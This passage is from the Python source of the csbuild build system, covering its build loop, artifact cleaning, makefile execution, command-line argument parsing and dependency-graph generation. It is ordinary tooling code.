fileList:\n\t\t\t\t\tbreak\n\n\t\t\t\t_enqueueBuild(buildProject, tool, fileList, pool, projectBuildList, projectsWithCrossProjectDeps, None, True)\n\t\t\t\tqueuedSomething = True\n\n\tif not queuedSomething:\n\t\tlog.Build(\"Nothing to build.\")\n\t\tpool.Stop()\n\t\treturn 0\n\n\twith perf_timer.PerfTimer(\"Running builds\"):\n\t\twhile True:\n\t\t\twith perf_timer.PerfTimer(\"Main thread idle\"):\n\t\t\t\tcallback = callbackQueue.GetBlocking()\n\n\t\t\tif callback is thread_pool.ThreadPool.exitEvent:\n\t\t\t\tbreak\n\n\t\t\ttoReraise = None\n\t\t\ttry:\n\t\t\t\tcallback()\n\t\t\texcept thread_pool.ThreadedTaskException as e:\n\t\t\t\t_runningBuilds -= 1\n\t\t\t\tif _runningBuilds == 0:\n\t\t\t\t\t# We have no builds running and finishing this build did not spawn a new one\n\t\t\t\t\t# Time to exit.\n\t\t\t\t\tpool.Stop()\n\t\t\t\tfailures += 1\n\t\t\t\ttoReraise = e\n\t\t\texcept:\n\t\t\t\tpool.Abort()\n\t\t\t\traise\n\n\t\t\tif toReraise is not None:\n\t\t\t\ttry:\n\t\t\t\t\ttoReraise.Reraise()\n\t\t\t\texcept csbuild.BuildFailureException as buildExc:\n\t\t\t\t\tlog.Error(repr(buildExc))\n\t\t\t\texcept:\n\t\t\t\t\tpool.Abort()\n\t\t\t\t\traise\n\n\tfor buildProject in projectBuildList:\n\t\tif buildProject.toolchain.HasAnyReachability():\n\t\t\tlog.Error(\"Project {} did not finish building.\", buildProject)\n\t\t\tfailures += 1\n\n\tlog.Build(\"Build finished. Completed {} tasks in {}\", shared_globals.totalBuilds, FormatTime(time.time() - buildStart))\n\treturn failures\n\n@TypeChecked(projectCleanList=list, keepArtifactsAndDirectories=bool)\ndef _clean(projectCleanList, keepArtifactsAndDirectories):\n\t\"\"\"\n\tClean the files built in previous builds.\n\n\t:param projectCleanList: List of projects\n\t:type projectCleanList: list[project.Project]\n\t:param keepArtifactsAndDirectories: If true, clean will not close the artifacts file and will not delete directories\n\t:type keepArtifactsAndDirectories: bool\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Cleaning build artifacts\"):\n\t\tlog.Build(\"Cleaning...\")\n\t\tdef _rmDirIfPossible(dirname):\n\t\t\twith perf_timer.PerfTimer(\"Removing directories (if possible)\"):\n\t\t\t\tif os.access(dirname, os.F_OK):\n\t\t\t\t\tcontainsOnlyDirs = True\n\t\t\t\t\tfor _, _, files in os.walk(dirname):\n\t\t\t\t\t\tif files:\n\t\t\t\t\t\t\tcontainsOnlyDirs = False\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif containsOnlyDirs:\n\t\t\t\t\t\tlog.Build(\"Removing {}\", dirname)\n\t\t\t\t\t\t#If it contains only directories and no files, remove everything\n\t\t\t\t\t\tshutil.rmtree(dirname)\n\t\t\t\t\t\t#Then if its parent directory is empty, remove it and any dirs above it that are also empty\n\t\t\t\t\t\tparentDir = os.path.dirname(dirname)\n\t\t\t\t\t\tif not os.listdir(parentDir):\n\t\t\t\t\t\t\tos.removedirs(parentDir)\n\n\t\tfor cleanProject in projectCleanList:\n\t\t\tlog.Info(\"Cleaning project {}\", cleanProject)\n\t\t\twith perf_timer.PerfTimer(\"Removing artifacts\"):\n\t\t\t\tfor artifacts in cleanProject.lastRunArtifacts.values():\n\t\t\t\t\tfor artifact in artifacts:\n\t\t\t\t\t\tif os.access(artifact, os.F_OK):\n\t\t\t\t\t\t\tlog.Info(\"Removing {}\", artifact)\n\t\t\t\t\t\t\tos.remove(artifact)\n\t\t\t\tcleanProject.lastRunArtifacts = collections.OrderedDict()\n\n\t\t\tif not keepArtifactsAndDirectories:\n\t\t\t\t_rmDirIfPossible(cleanProject.csbuildDir)\n\t\t\t\t_rmDirIfPossible(cleanProject.intermediateDir)\n\t\t\t\t_rmDirIfPossible(cleanProject.outputDir)\n\n\ndef _execfile(filename, glob, loc):\n\twith perf_timer.PerfTimer(\"Parsing Makefiles\"):\n\t\twith open(filename, \"r\") as f:\n\t\t\tglob[\"__file__\"] = filename\n\t\t\t# pylint: disable=exec-used\n\t\t\texec(compile(f.read(), filename, \"exec\"), glob, loc)\n\ndef _setupDefaultTargets():\n\tif csbuild.addDefaultTargets:\n\t\tfrom ..tools.common.tool_traits import HasOptimizationLevel\n\t\tOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\t\tfrom ..tools.common.tool_traits import HasDebugLevel\n\t\tDebugLevel = HasDebugLevel.DebugLevel\n\t\t#Create the default targets...\n\t\toldPlan = csbuild.currentPlan\n\t\tfor plan in project_plan.allPlans:\n\t\t\tlog.Info(\"Setting up default targets for {}\", plan)\n\t\t\tcsbuild.currentPlan = project_plan.allPlans[plan]\n\t\t\twith csbuild.Target(\"release\"):\n\t\t\t\tlog.Info(\"Setting up target 'release'\")\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetOptimizationLevelIfUnset(OptimizationLevel.Max)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support an optimization level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugLevelIfUnset(DebugLevel.Disabled)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugRuntimeIfUnset(False)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug runtime\n\t\t\t\t\tpass\n\t\t\t\tcsbuild.AddDefines(\"NDEBUG\")\n\n\t\t\twith csbuild.Target(\"debug\"):\n\t\t\t\tlog.Info(\"Setting up target 'debug'\")\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetOptimizationLevelIfUnset(OptimizationLevel.Disabled)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support an optimization level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugLevelIfUnset(DebugLevel.EmbeddedSymbols)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugRuntimeIfUnset(True)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug runtime\n\t\t\t\t\tpass\n\t\t\t\tcsbuild.AddDefines(\"_DEBUG\")\n\n\t\t\twith csbuild.Target(\"fastdebug\"):\n\t\t\t\tlog.Info(\"Setting up target 'fastdebug'\")\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetOptimizationLevelIfUnset(OptimizationLevel.Max)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support an optimization level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugLevelIfUnset(DebugLevel.EmbeddedSymbols)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugRuntimeIfUnset(False)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug runtime\n\t\t\t\t\tpass\n\t\t\t\tcsbuild.AddDefines(\"_DEBUG\")\n\t\t\t\tcsbuild.AddDefines(\"_FASTDEBUG\")\n\t\t\tlog.Info(\"{}\", csbuild.currentPlan.knownTargets)\n\t\tcsbuild.currentPlan = oldPlan\n\ndef Run():\n\t\"\"\"\n\tRun the build! This is the main entry point for csbuild.\n\t\"\"\"\n\tshared_globals.startTime = time.time()\n\n\twith perf_timer.PerfTimer(\"Argument Parsing\"):\n\t\tmainFileDir = \"\"\n\t\tmainFile = sys.modules['__main__'].__file__\n\t\tscriptFiles = []\n\t\tmakefileDict = {}\n\n\t\ttools.InitTools()\n\n\t\tif mainFile is not None:\n\t\t\tmainFileDir = os.path.abspath(os.path.dirname(mainFile))\n\t\t\tif mainFileDir:\n\t\t\t\tos.chdir(mainFileDir)\n\t\t\t\tmainFile = os.path.basename(os.path.abspath(mainFile))\n\t\t\telse:\n\t\t\t\tmainFileDir = os.path.abspath(os.getcwd())\n\t\t\tscriptFiles.append(os.path.join(mainFileDir, mainFile))\n\t\t\tif \"-h\" in sys.argv or \"--help\" in sys.argv:\n\t\t\t\tshared_globals.runMode = csbuild.RunMode.Help\n\t\t\t\t_execfile(mainFile, makefileDict, makefileDict)\n\t\t\t\t_setupDefaultTargets()\n\t\telse:\n\t\t\tlog.Error(\"csbuild cannot be run from the interactive console.\")\n\t\t\tsystem.Exit(1)\n\n\t\tepilog = \" ------------------------------------------------------------ \\n\\nProjects available in this makefile (listed in build order):\\n\\n\"\n\n\t\tprojtable = [[]]\n\t\ti = 1\n\t\tj = 0\n\n\t\tmaxcols = 4#min(math.floor(len(shared_globals.sortedProjects) / 4), 4)\n\n\t\tfor proj in shared_globals.sortedProjects:\n\t\t\tprojtable[j].append(proj.name)\n\t\t\tif i < maxcols:\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tprojtable.append([])\n\t\t\t\ti = 1\n\t\t\t\tj += 1\n\n\t\tif projtable:\n\t\t\tmaxlens = [15] * len(projtable[0])\n\t\t\tfor col in projtable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\tmaxlens[subindex] = max(maxlens[subindex], len(item))\n\n\t\t\tfor col in projtable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\titem = col[subindex]\n\t\t\t\t\tepilog += \" \"\n\t\t\t\t\tepilog += item\n\t\t\t\t\tfor _ in range(maxlens[subindex] - len(item)):\n\t\t\t\t\t\tepilog += \" \"\n\t\t\t\t\tepilog += \" \"\n\t\t\t\tepilog += \"\\n\"\n\n\t\tepilog += \"\\nTargets available in this makefile:\\n\\n\"\n\n\t\ttargtable = [[]]\n\t\ti = 1\n\t\tj = 0\n\n\t\tmaxcols = 4#min(math.floor(len(shared_globals.allTargets) / 4), 4)\n\n\t\tfor targ in sorted(shared_globals.allTargets):\n\t\t\tif targ == csbuild.currentPlan.defaultTarget:\n\t\t\t\ttarg += \" (default)\"\n\t\t\ttargtable[j].append(targ)\n\t\t\tif i < maxcols:\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\ttargtable.append([])\n\t\t\t\ti = 1\n\t\t\t\tj += 1\n\n\t\tif targtable:\n\t\t\tmaxlens = [15] * len(targtable[0])\n\t\t\tfor col in targtable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\tmaxlens[subindex] = max(maxlens[subindex], len(item))\n\n\t\t\tfor col in targtable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\tepilog += \" \"\n\t\t\t\t\tepilog += item\n\t\t\t\t\tfor _ in range(maxlens[subindex] - len(item)):\n\t\t\t\t\t\tepilog += \" \"\n\t\t\t\t\tepilog += \" \"\n\t\t\t\tepilog += \"\\n\"\n\n\t\tepilog += \"\\nAvailable solution generators:\\n\\n\"\n\n\t\tgentable = [[]]\n\t\ti = 1\n\t\tj = 0\n\n\t\tmaxcols = 4#min(math.floor(len(shared_globals.allGenerators) / 4), 4)\n\n\t\tfor gen in sorted(shared_globals.allGenerators.keys()):\n\t\t\tgentable[j].append(gen)\n\t\t\tif i < maxcols:\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tgentable.append([])\n\t\t\t\ti = 1\n\t\t\t\tj += 1\n\n\t\tif gentable:\n\t\t\tmaxlens = [15] * len(gentable[0])\n\t\t\tfor col in gentable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\tmaxlens[subindex] = max(maxlens[subindex], len(item))\n\n\t\t\tfor col in gentable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\tepilog += \" \"\n\t\t\t\t\tepilog += item\n\t\t\t\t\tfor _ in range(maxlens[subindex] - len(item)):\n\t\t\t\t\t\tepilog += \" \"\n\t\t\t\t\tepilog += \" \"\n\t\t\t\tepilog += \"\\n\"\n\n\t\tparser = shared_globals.parser = argparse.ArgumentParser(\n\t\t\tprog = mainFile, epilog = epilog, formatter_class = argparse.RawDescriptionHelpFormatter)\n\n\t\tparser.add_argument('--version', action = \"store_true\", help = \"Print version information and exit\")\n\n\t\tgroup = parser.add_mutually_exclusive_group()\n\t\tgroup.add_argument('-t', '--target', action='append', help = 'Target(s) for build. (May be specified multiple times.)', default=[])\n\t\tgroup.add_argument('--at', \"--all-targets\", action = \"store_true\", help = \"Build all targets\")\n\n\t\tparser.add_argument(\"-p\", \"--project\",\n\t\t\t\t\t\t\taction=\"append\", help = \"Build only the specified project. (May be specified multiple times.)\",)\n\n\t\tgroup = parser.add_mutually_exclusive_group()\n\t\tgroup.add_argument('-o', '--toolchain', help = \"Toolchain(s) to use for compiling. (May be specified multiple times.)\",\n\t\t\tdefault=[], action = \"append\")\n\t\tgroup.add_argument(\"--ao\", '--all-toolchains', help=\"Build with all toolchains\", action = \"store_true\")\n\n\t\tgroup = parser.add_mutually_exclusive_group()\n\t\tgroup.add_argument(\"-a\", \"--architecture\", \"--arch\", help = 'Architecture(s) to compile for each toolchain. (May be specified multiple times.)', action = \"append\",)\n\t\tgroup.add_argument(\"--aa\", \"--all-architectures\", \"--all-arch\", action = \"store_true\", help = \"Build all architectures supported by this toolchain\")\n\n\t\tgroup = parser.add_mutually_exclusive_group()\n\t\tgroup.add_argument('-c', '--clean', action = \"store_true\", help = 'Clean the target build')\n\t\t#group.add_argument('--install', action = \"store_true\", help = 'Install the target build')\n\t\t#group.add_argument('--install-headers', action = \"store_true\", help = 'Install only headers for the target build')\n\t\t#group.add_argument('--install-output', action = \"store_true\", help = 'Install only the output for the target build')\n\t\tgroup.add_argument('-r', '--rebuild', action = \"store_true\", help = 'Clean the target build and then build it')\n\n\t\tgroup2 = parser.add_mutually_exclusive_group()\n\t\tgroup2.add_argument('-v', '--verbose', action = \"store_const\", const = 0, dest = \"verbosity\",\n\t\t\thelp = \"Verbose. Enables additional INFO-level logging.\", default = 1)\n\t\tgroup2.add_argument('-q', '--quiet', action = \"store_const\", const = 2, dest = \"verbosity\",\n\t\t\thelp = \"Quiet. Disables all logging except for WARN and ERROR.\", default = 1)\n\t\tgroup2.add_argument('-qq', '--very-quiet', action = \"store_const\", const = 3, dest = \"verbosity\",\n\t\t\thelp = \"Very quiet. Disables all csb-specific logging.\", default = 1)\n\n\t\tparser.add_argument(\"-j\", \"--jobs\", action = \"store\", dest = \"jobs\", type = int, help = \"Number of simultaneous build processes\")\n\n\t\t#parser.add_argument(\"-g\", \"--gui\", action = \"store_true\", dest = \"gui\", help = \"Show GUI while building (experimental)\")\n\t\t#parser.add_argument(\"--auto-close-gui\", action = \"store_true\", help = \"Automatically close the gui on build success (will stay open on failure)\")\n\t\t#parser.add_argument(\"--profile\", action=\"store_true\", help=\"Collect detailed line-by-line profiling information on compile time. --gui option required to see this information.\")\n\n\t\tparser.add_argument('--show-commands', help = \"Show all commands sent to the system.\", action = \"store_true\")\n\t\tparser.add_argument('--force-color', help = \"Force color on or off.\",\n\t\t\taction = \"store\", choices = [\"on\", \"off\"], default = None, const = \"on\", nargs = \"?\")\n\t\tparser.add_argument('--force-progress-bar', help = \"Force progress bar on or off.\",\n\t\t\taction = \"store\", choices = [\"on\", \"off\"], default = None, const = \"on\", nargs = \"?\")\n\n\t\t#parser.add_argument('--prefix', help = \"install prefix (default /usr/local)\", action = \"store\")\n\t\t#parser.add_argument('--libdir', help = \"install location for libraries (default {prefix}/lib)\", action = \"store\")\n\t\t#parser.add_argument('--incdir', help = \"install prefix (default {prefix}/include)\", action = \"store\")\n\n\t\tparser.add_argument(\"--stop-on-error\", help = \"Stop compilation after the first error is encountered.\", action = \"store_true\")\n\t\t#parser.add_argument('--no-precompile', help = \"Disable precompiling globally, affects all projects\",\n\t\t#\taction = \"store_true\")\n\t\t#parser.add_argument('--no-chunks', help = \"Disable chunking globally, affects all projects\",\n\t\t#\taction = \"store_true\")\n\n\t\tparser.add_argument('--dg', '--dependency-graph', help=\"Generate dependency graph\", action=\"store_true\")\n\t\tparser.add_argument('--dg-stubs', '--dependency-graph-stubs', help=\"Generate dependency graph with stubs\", action=\"store_true\")\n\t\tparser.add_argument('--dg-type', '--dependency-graph-type', help=\"Graphviz engine to use for DG\", action=\"store\", default=\"dot\", choices=[\"dot\", \"neato\", \"twopi\", \"circo\", \"fdp\", \"sfdp\"])\n\n\t\tparser.add_argument('--clear-cache', help=\"Removes cached data such as header dependency caches and artifact metadata (note: will trigger a rebuild)\", action=\"store_true\")\n\n\t\tparser.add_argument(\"--perf-report\", help=\"Collect and show perf report at the end of execution\",\n\t\t\t\t\t\t\taction = \"store\", choices = [\"tree\", \"flat\", \"html\"], default = None, const = \"tree\", nargs = \"?\")\n\n\t\t#parser.add_argument(\"-d\", \"--define\", help = \"Add defines to each project being built.\", action = \"append\")\n\n\t\tgroup = parser.add_argument_group(\"Solution generation\", \"Commands to generate a solution\")\n\t\tgroup.add_argument('--generate-solution', help = \"Generate a solution file for use with the given IDE.\",\n\t\t\taction = \"store\")\n\t\tgroup.add_argument('--solution-path',\n\t\t\thelp = \"Path to output the solution file (default is ./Solutions/<solutiontype>)\", action = \"store\",\n\t\t\tdefault = \"\")\n\t\tgroup.add_argument('--solution-name', help = \"Name of solution output file (default is csbuild)\", action = \"store\",\n\t\t\tdefault = \"csbuild\")\n\t\tgroup.add_argument('--solution-args', help = 'Arguments passed to the build script executed by the solution',\n\t\t\taction = \"store\", default = \"\")\n\n\t\t#TODO: Additional args here\n\t\t# for chain in _shared_globals.alltoolchains.items():\n\t\t# \tchainInst = chain[1]()\n\t\t# \targfuncs = set()\n\t\t# \tfor tool in chainInst.tools.values():\n\t\t# \t\tif(\n\t\t# \t\t\thasattr(tool.__class__, \"AdditionalArgs\")\n\t\t# \t\t\tand tool.__class__.AdditionalArgs != toolchain.compilerBase.AdditionalArgs\n\t\t# \t\t\tand tool.__class__.AdditionalArgs != toolchain.linkerBase.AdditionalArgs\n\t\t# \t\t):\n\t\t# \t\t\targfuncs.add(tool.__class__.AdditionalArgs)\n\t\t#\n\t\t# \tif argfuncs:\n\t\t# \t\tgroup = parser.add_argument_group(\"Options for toolchain {}\".format(chain[0]))\n\t\t# \t\tfor func in argfuncs:\n\t\t# \t\t\tfunc(group)\n\t\t#\n\t\t# for gen in _shared_globals.allgenerators.items():\n\t\t# \tif gen[1].AdditionalArgs != project_generator.project_generator.AdditionalArgs:\n\t\t# \t\tgroup = parser.add_argument_group(\"Options for solution generator {}\".format(gen[0]))\n\t\t# \t\tgen[1].AdditionalArgs(group)\n\t\t#\n\t\t# if _options:\n\t\t# \tgroup = parser.add_argument_group(\"Local makefile options\")\n\t\t# \tfor option in _options:\n\t\t# \t\tgroup.add_argument(*option[0], **option[1])\n\n\t\t#args, remainder = parser.parse_known_args()\n\t\t#args.remainder = remainder\n\t\t#TODO: temporary, set runPerfReport to false so unknown flags don't trigger perf report to get printed\n\t\t#Once custom options are implemented this will not be needed and will go away.\n\t\tperf_timer.EnablePerfTracking(False)\n\t\targs = parser.parse_args()\n\n\t\tif args.version:\n\t\t\tshared_globals.runMode = csbuild.RunMode.Version\n\n\t\t\tprint(\"CSBuild version {}\".format(csbuild.__version__))\n\t\t\tprint(csbuild.__copyright__)\n\t\t\tprint(\"Code by {}\".format(csbuild.__author__))\n\t\t\tprint(\"Additional credits: {}\\n\".format(\", \".join(csbuild.__credits__)))\n\t\t\tprint(\"Maintainer: {} - {}\".format(csbuild.__maintainer__, csbuild.__email__))\n\t\t\treturn\n\n\t\tcsbDir = os.path.join(mainFileDir, \".csbuild\")\n\t\tshared_globals.settings = settings_manager.SettingsManager(os.path.join(csbDir, \"settings\"))\n\n\t\tif args.clear_cache:\n\t\t\tshared_globals.settings.Clear()\n\t\t\targs.rebuild = True\n\n\t\tshared_globals.verbosity = args.verbosity\n\t\tshared_globals.showCommands = args.show_commands\n\t\tif args.perf_report is not None:\n\t\t\tperf_timer.EnablePerfTracking(True)\n\t\t\tif args.perf_report == \"tree\":\n\t\t\t\tshared_globals.runPerfReport = perf_timer.ReportMode.TREE\n\t\t\telif args.perf_report == \"flat\":\n\t\t\t\tshared_globals.runPerfReport = perf_timer.ReportMode.FLAT\n\t\t\telse:\n\t\t\t\tshared_globals.runPerfReport = perf_timer.ReportMode.HTML\n\n\t\tif args.force_color == \"on\":\n\t\t\tshared_globals.colorSupported = True\n\t\telif args.force_color == \"off\":\n\t\t\tshared_globals.colorSupported = False\n\t\telse:\n\t\t\tshared_globals.colorSupported = terminfo.TermInfo.SupportsColor()\n\n\t\tif args.dg:\n\t\t\tshared_globals.runMode = csbuild.RunMode.GenerateDependencyGraph\n\n\t\tif args.generate_solution:\n\n\t\t\tshared_globals.runMode = csbuild.RunMode.GenerateSolution\n\t\t\tshared_globals.solutionGeneratorType = args.generate_solution\n\n\t\t\tif args.solution_path:\n\t\t\t\tshared_globals.solutionPath = args.solution_path\n\t\t\telse:\n\t\t\t\tshared_globals.solutionPath = \"./Solutions/{}/\".format(args.generate_solution)\n\n\t\t\tshared_globals.solutionPath = os.path.abspath(shared_globals.solutionPath)\n\n\t\t\tif not os.access(shared_globals.solutionPath, os.F_OK):\n\t\t\t\tos.makedirs(shared_globals.solutionPath)\n\n\t\t\tif args.solution_args:\n\t\t\t\tshared_globals.solutionArgs = args.solution_args\n\n\t\t\tif args.solution_name:\n\t\t\t\tsolutionName = args.solution_name\n\t\t\telse:\n\t\t\t\tsolutionName = \"csbuild\"\n\n\t\t\[email protected]\n\t\t\tdef OnBuildFinished(projectList): # pylint: disable=unused-variable\n\t\t\t\t\"\"\"\n\t\t\t\t:param projectList: list of projects\n\t\t\t\t:type projectList: list[project.Project]\n\t\t\t\t\"\"\"\n\t\t\t\tsolutionTool = shared_globals.allGenerators[args.generate_solution].solutionTool\n\t\t\t\tif not os.access(shared_globals.solutionPath, os.F_OK):\n\t\t\t\t\tos.makedirs(shared_globals.solutionPath)\n\t\t\t\tsolutionTool.GenerateSolution(shared_globals.solutionPath, solutionName, projectList)\n\n\t\t\tfor tool in shared_globals.allGeneratorTools:\n\t\t\t\tcsbuild.Toolchain(*shared_globals.allToolchains).AddTool(tool)\n\n\t\t_execfile(mainFile, makefileDict, makefileDict)\n\t\t_setupDefaultTargets()\n\n\t\tif args.generate_solution:\n\t\t\tif args.generate_solution not in shared_globals.allGenerators:\n\t\t\t\tlog.Error(\"No such solution generator: {}\", args.generate_solution)\n\t\t\t\tsystem.Exit(1)\n\n\t\tif args.at:\n\t\t\ttargetList = list(shared_globals.allTargets)\n\t\telif args.target:\n\t\t\ttargetList = args.target\n\t\telse:\n\t\t\ttargetList = [project_plan.useDefault]\n\n\t\tif hasattr(args, \"aa\") and args.aa:\n\t\t\tarchList = list(shared_globals.allArchitectures)\n\t\telif hasattr(args, \"architecture\") and args.architecture:\n\t\t\tarchList = args.architecture\n\t\telse:\n\t\t\tarchList = [project_plan.useDefault]\n\n\t\tif args.ao:\n\t\t\ttoolchainList = list(shared_globals.allToolchains)\n\t\telif args.toolchain:\n\t\t\ttoolchainList = args.toolchain\n\t\telse:\n\t\t\ttoolchainList = [project_plan.useDefault]\n\n\t\tif not args.jobs:\n\t\t\targs.jobs = multiprocessing.cpu_count()\n\n\t\tif args.force_progress_bar == \"on\":\n\t\t\tshared_globals.columns = 80\n\t\telif args.force_progress_bar == \"off\":\n\t\t\tshared_globals.columns = 0\n\t\telse:\n\t\t\tshared_globals.columns = terminfo.TermInfo.GetNumColumns( )\n\t\tshared_globals.clearBar = \"\\r\" + \" \" * shared_globals.columns + \"\\r\"\n\n\tprojectBuildList = []\n\n\tpreparationStart = time.time()\n\tshared_globals.startTime = preparationStart\n\n\tif args.project:\n\t\tprojectFilter = set(args.project)\n\t\tadded = set()\n\t\tfilteredProjects = dag.DAG(lambda x: x.name)\n\t\tfor plan in reversed(list(shared_globals.sortedProjects)):\n\t\t\tif plan.name in projectFilter:\n\t\t\t\tif plan.name not in added:\n\t\t\t\t\tadded.add(plan.name)\n\t\t\t\t\tprojectFilter.update(plan.depends)\n\t\t\t\t\tfilteredProjects.Add(plan, plan.depends)\n\t\tshared_globals.sortedProjects = filteredProjects\n\t\tnonexistent = projectFilter - added\n\t\tif nonexistent:\n\t\t\tlog.Error(\"No such project(s): {}\", \", \".join(nonexistent))\n\t\t\tsystem.Exit(1)\n\n\t# Note:\n\t# The reason for this bit of code is that the import lock, in the way that CSBuild operates, prevents\n\t# us from being able to call subprocess.Popen() or any other process execution function other than os.popen().\n\t# csbuild is replacing the global import lock with its own lock to achieve the same functionality without the hang.\n\t# We then release the global import lock, but no one using csbuild should ever have to care about that, ever.\n\n\tclass _importLocker(object):\n\t\t\"\"\"\n\t\tThis replaces the global import lock with a new lock to get around a hang in subprocess.Popen() when the lock's held\n\t\t\"\"\"\n\t\tdef __init__(self):\n\t\t\tself.lock = threading.RLock()\n\t\t\tself.loader = None\n\n\t\t#pylint: disable=invalid-name\n\t\tdef find_module(self, fullname, path=None):\n\t\t\t\"\"\"\n\t\t\tFind the module loader, always returns self so the load_module will be called and the lock released\n\t\t\t:param fullname: name of module\n\t\t\t:type fullname: str\n\t\t\t:param path: path to look in\n\t\t\t:type path: str\n\t\t\t:return: self\n\t\t\t:rtype: _importBlocker\n\t\t\t\"\"\"\n\t\t\tself.lock.acquire()\n\t\t\tsys.meta_path.pop(0)\n\t\t\tself.loader = imp.find_module(fullname.rpartition(\".\")[2], path)\n\t\t\tsys.meta_path.insert(0, self)\n\t\t\tif self.loader is not None:\n\t\t\t\treturn self\n\t\t\tself.lock.release()\n\t\t\treturn None\n\n\t\tdef load_module(self, name):\n\t\t\t\"\"\"\n\t\t\tLoad the module from whatever loader we actually found to load it, then release the lock\n\t\t\t:param name: name of module\n\t\t\t:type name: str\n\t\t\t:return: the loaded module\n\t\t\t:rtype: module\n\t\t\t\"\"\"\n\t\t\ttry:\n\t\t\t\treturn imp.load_module(name, *self.loader)\n\t\t\tfinally:\n\t\t\t\tself.lock.release()\n\n\tsys.meta_path.insert(0, _importLocker())\n\n\tfailures = 0\n\n\tif imp.lock_held():\n\t\timp.release_lock()\n\tlog.StartLogThread()\n\n\twith perf_timer.PerfTimer(\"Project plan execution\"):\n\t\tlog.Build(\"Preparing build...\")\n\t\tfor toolchainName in toolchainList:\n\t\t\tlog.Info(\"Collecting projects for toolchain {}\", toolchainName)\n\t\t\tfor archName in archList:\n\t\t\t\tlog.Info(\"-- Architecture {}\", archName)\n\t\t\t\tfor targetName in targetList:\n\t\t\t\t\tlog.Info(\"---- Target {}\", targetName)\n\t\t\t\t\tfor plan in shared_globals.sortedProjects:\n\t\t\t\t\t\tlog.Info(\"------ Project {}\", plan.name)\n\t\t\t\t\t\tproj = plan.ExecutePlan(toolchainName, archName, targetName)\n\t\t\t\t\t\tif proj is None:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tshared_globals.projectMap.setdefault(proj.toolchainName, {}) \\\n\t\t\t\t\t\t\t.setdefault(proj.architectureName, {}) \\\n\t\t\t\t\t\t\t.setdefault(proj.targetName, {})[plan.name] = proj\n\t\t\t\t\t\tif proj.projectType != csbuild.ProjectType.Stub or csbuild.GetRunMode() == csbuild.RunMode.GenerateSolution or args.dg:\n\t\t\t\t\t\t\tprojectBuildList.append(proj)\n\n\tif not projectBuildList:\n\t\tlog.Error(\"No projects were found supporting the requested architecture, toolchain, target, and platform combination\")\n\t\tsystem.Exit(1)\n\n\n\twith perf_timer.PerfTimer(\"Dependency resolution\"):\n\t\tfor proj in projectBuildList:\n\t\t\tproj.ResolveDependencies()\n\n\tif args.dg:\n\t\tbuilder = 'digraph G {{\\n\\tlayout=\"{}\";\\n\\toverlap=\"false\";\\n\\tsplines=\"spline\";\\n\\tratio=0.7;\\n\\trankdir=\"LR\"\\n'.format(args.dg_type)\n\t\tcolors = [\n\t\t\t\"#ff0000\", \"#cc5200\", \"#b2742d\", \"#858c23\", \"#20802d\",\n\t\t\t\"#00ffcc\", \"#39c3e6\", \"#205380\", \"#003380\", \"#38008c\",\n\t\t\t\"#ff40d9\", \"#e53967\", \"#f20000\", \"#7f4620\", \"#cca300\",\n\t\t\t\"#66ff00\", \"#00cc6d\", \"#36d9ce\", \"#007a99\", \"#0061f2\",\n\t\t\t\"#0000f2\", \"#cc00ff\", \"#d9368d\", \"#7f202d\", \"#991400\",\n\t\t\t\"#f28100\", \"#dae639\", \"#69bf30\", \"#269973\", \"#208079\",\n\t\t\t\"#00a2f2\", \"#397ee6\", \"#0000e6\", \"#8d29a6\", \"#990052\"\n\t\t]\n\t\tidx = 0\n\t\tprojectsInGraph = []\n\t\tfor buildProj in projectBuildList:\n\t\t\tlog.Info(buildProj.name)\n\t\t\tcolor = colors[idx]\n\t\t\tidx += 1\n\t\t\tif idx == len(colors):\n\t\t\t\tidx = 0\n\n\t\t\tif buildProj.projectType == csbuild.ProjectType.Application:\n\t\t\t\tshape = \"doublecircle\"\n\t\t\telif buildProj.projectType == csbuild.ProjectType.Stub:\n\t\t\t\tif not args.dg_stubs:\n\t\t\t\t\tcontinue\n\t\t\t\tgood = False\n\t\t\t\tfor proj in projectBuildList:\n\t\t\t\t\tif buildProj in proj.dependencies:\n\t\t\t\t\t\tgood = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif not good:\n\t\t\t\t\tcontinue\n\n\t\t\t\tshape = \"oval\"\n\t\t\t\tcolor = \"#000000\"\n\t\t\telse:\n\t\t\t\tshape = 